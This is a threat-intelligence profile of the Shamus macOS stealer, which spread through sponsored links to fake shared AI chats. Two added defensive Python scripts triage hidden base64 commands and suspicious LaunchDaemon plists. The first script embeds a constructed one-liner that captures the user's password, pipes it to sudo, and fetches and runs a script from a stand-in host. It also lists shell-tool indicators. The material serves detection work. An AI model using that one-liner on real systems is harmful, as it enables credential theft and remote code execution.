Shamus
Shamus is a macOS information stealer and cryptocurrency thief. In the referenced campaign, threat actors abused legitimate AI platforms, including ChatGPT and DeepSeek, by placing sponsored Google search results that redirected users looking for macOS troubleshooting advice to fake shared-chat links. Those chats contained hidden base64-encoded commands that started the infection.

The chain began with a bash script that prompted the user for their system password; the captured password was then used to escalate privileges and download the main malware binary. Breakpoint Security identified the sample as Shamus.

The malware obfuscates its code with arithmetic and XOR encoding on top of a custom 6-bit decoder, which hinders static analysis and signature-based detection. It persists through a LaunchDaemon configured to run at startup; installing a LaunchDaemon requires root, which is what the captured password and the earlier privilege escalation provide.

Shamus steals browser cookies and saved passwords from Chrome, 12 other Chromium-based browsers, and Firefox; targets 15 cryptocurrency wallet applications, both software wallets and the companion apps for hardware wallets, including Ledger Live, Trezor Suite, Exodus, Coinomi, Electrum, and Bitcoin Core; and collects the entire macOS Keychain database, Telegram session data, VPN profiles, and files from the Desktop and Documents folders. Stolen data is compressed and exfiltrated to attacker-controlled command-and-control servers over encrypted channels.
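The chat-embedded base64 commands described above are the delivery stage a defender can triage offline from a saved copy of the page. The following is an added example, not code from the campaign write-up or from Breakpoint Security: it finds base64 runs in text, decodes them, and flags decoded output that contains fetch, escalate or execute indicators typical of a password-prompting installer one-liner. The chat text, the embedded command, the URL (a .invalid domain) and the indicator list are constructed assumptions, not observed Shamus artifacts.

```python
"""Triage text (e.g. a saved "shared chat" page) for hidden base64 shell commands.

Added example for this page, not code from the campaign write-up. The sample chat
text and the embedded command are constructed; the indicator list is an assumption
about what a macOS password-prompting installer one-liner tends to contain.
"""
import base64
import binascii
import re
import string

# Constructed stand-in for the decoded one-liner: silent password read, fed to sudo,
# then fetch and run a payload. The URL is an assumption (.invalid never resolves).
CONSTRUCTED_COMMAND = (
    'read -s -p "Password: " PW; echo "$PW" | sudo -S '
    'curl -fsSL https://example.invalid/fix.sh -o /tmp/fix.sh; '
    'chmod +x /tmp/fix.sh; /tmp/fix.sh'
)

# Constructed chat text: one malicious blob, one hex hash (decodes to binary junk),
# one benign base64 note. None of this is taken from a real shared chat.
CONSTRUCTED_CHAT = (
    "Assistant: This happens when the cache is stale. Open Terminal and run:\n"
    "echo " + base64.b64encode(CONSTRUCTED_COMMAND.encode()).decode() + " | base64 -d | bash\n"
    "A reference SHA-256 for the helper is "
    "3f786850e387550fdab836ed7e6dc881de23001b2b2b2b2b2b2b2b2b2b2b2b2b\n"
    "Ticket reference: " + base64.b64encode(b"nothing to see here, just an ordinary note").decode() + "\n"
)

# Substrings that, in decoded output, mark shell that fetches, escalates or executes.
COMMAND_INDICATORS = (
    "curl ", "wget ", "sudo ", "read -s", "chmod +x", "/tmp/", "bash", "sh -c",
    "osascript", "base64 -d", "base64 --decode", "xattr -d", "launchctl", "nohup",
)

# Base64 alphabet runs of at least 40 characters with optional padding.
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
PRINTABLE = set(string.printable)


def decode_if_text(blob):
    """Return decoded text if blob is valid base64 of mostly printable ASCII, else None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", errors="replace")
    if not text or sum(c in PRINTABLE for c in text) / len(text) < 0.9:
        return None  # hex hashes and other base64-looking tokens land here
    return text


def scan_text(text):
    """Find base64 runs, decode them and report which ones look like shell commands."""
    hits = []
    for m in BLOB_RE.finditer(text):
        decoded = decode_if_text(m.group(0))
        if decoded is None:
            continue
        found = [ind for ind in COMMAND_INDICATORS if ind in decoded]
        hits.append({"offset": m.start(), "decoded": decoded,
                     "indicators": found, "suspicious": bool(found)})
    return hits


if __name__ == "__main__":
    for h in scan_text(CONSTRUCTED_CHAT):
        flag = "SUSPICIOUS" if h["suspicious"] else "benign"
        print(f"[{flag}] offset={h['offset']} indicators={h['indicators']}")
        print("    " + h["decoded"][:120])
```

The printable-ratio check is what keeps hashes and binary-looking tokens out of the results; the indicator list is deliberately broad because the decoded text is only a triage signal, and the analyst still reads what was decoded before acting on it.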
Recent activity
2 sources tracked across advisories, community write-ups, and news.
Stealer malware referenced as being distributed via poisoned shared AI-chat troubleshooting/installation guides promoted through SEO poisoning and sponsored search results.
Shamus is a sophisticated multi-stage information stealer and cryptocurrency thief targeting macOS systems. It uses multi-layered encoding and obfuscation to evade detection, steals browser credentials, cryptocurrency wallet data, macOS Keychain, Telegram sessions, VPN profiles, and files, and maintains persistence via LaunchDaemon.
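The LaunchDaemon persistence both sources mention can be hunted by parsing the job plists under /Library/LaunchDaemons rather than by matching a known label. The following is an added example and not code from either source: it parses plist bytes with plistlib and scores each job on RunAtLoad combined with a non-Apple program path, a program living in a temp or user-writable location, an Apple-looking label over a non-Apple program, and hidden path components. The three plists, their labels and paths, and the trusted and suspicious prefix lists are constructed assumptions, not observed Shamus artifacts.

```python
"""Triage LaunchDaemon plists for root-level startup persistence.

Added example for this page, not code from either source. The plists below are
constructed; the trusted-prefix and suspicious-location lists are assumptions
a defender would tune to their own fleet.
"""
import plistlib

# Assumed locations a root daemon's program can legitimately live in.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/Library/Apple/")
# Assumed locations where a legitimate root daemon should not live.
SUSPICIOUS_LOCATIONS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/",
                        "/private/var/folders/")

# Constructed plists keyed by their on-disk path; serialized so the triage code
# exercises the same plistlib parsing it would use on real files.
CONSTRUCTED_PLISTS = {
    # Apple-style label hiding a program in a dotted directory under /Users/Shared.
    "/Library/LaunchDaemons/com.apple.systemhelper.plist": plistlib.dumps({
        "Label": "com.apple.systemhelper",
        "RunAtLoad": True,
        "KeepAlive": True,
        "ProgramArguments": ["/Users/Shared/.cache/.svc", "--daemon"],
    }),
    # Ordinary third-party daemon: runs at boot, but from a normal vendor path.
    "/Library/LaunchDaemons/com.example.backup.plist": plistlib.dumps({
        "Label": "com.example.backup",
        "RunAtLoad": True,
        "ProgramArguments": ["/Library/Application Support/ExampleBackup/agent"],
    }),
    # Apple-shipped job, using the Program key instead of ProgramArguments.
    "/System/Library/LaunchDaemons/com.apple.example.plist": plistlib.dumps({
        "Label": "com.apple.example",
        "RunAtLoad": True,
        "Program": "/usr/libexec/example",
    }),
}


def program_path(plist):
    """Executable a launchd job runs: Program wins, else ProgramArguments[0]."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def triage_plist(path, data):
    """Parse one plist and return the reasons it deserves a closer look."""
    plist = plistlib.loads(data)
    program = program_path(plist)
    label = str(plist.get("Label", ""))
    trusted = program.startswith(TRUSTED_PREFIXES)
    reasons = []
    if plist.get("RunAtLoad") and not trusted:
        reasons.append("RunAtLoad with program outside trusted prefixes")
    if program.startswith(SUSPICIOUS_LOCATIONS):
        reasons.append("program lives in a temp or user-writable location")
    if label.startswith("com.apple.") and not trusted:
        reasons.append("Apple-style label but non-Apple program")
    if any(part.startswith(".") for part in program.split("/") if part):
        reasons.append("hidden path component in program path")
    return {"path": path, "label": label, "program": program,
            "reasons": reasons, "score": len(reasons)}


def triage_all(plists_by_path):
    """Triage every plist and return results, most suspicious first."""
    return sorted((triage_plist(p, d) for p, d in plists_by_path.items()),
                  key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in triage_all(CONSTRUCTED_PLISTS):
        print(f"score={r['score']} {r['label']} -> {r['program']}")
        for reason in r["reasons"]:
            print("    " + reason)
```

On a live host, feed it the bytes of each file under /Library/LaunchDaemons (the root-level location the description's LaunchDaemon persistence implies) and diff the results against a known-good baseline; the same scoring applies to per-user LaunchAgents, only with a different trusted-prefix list.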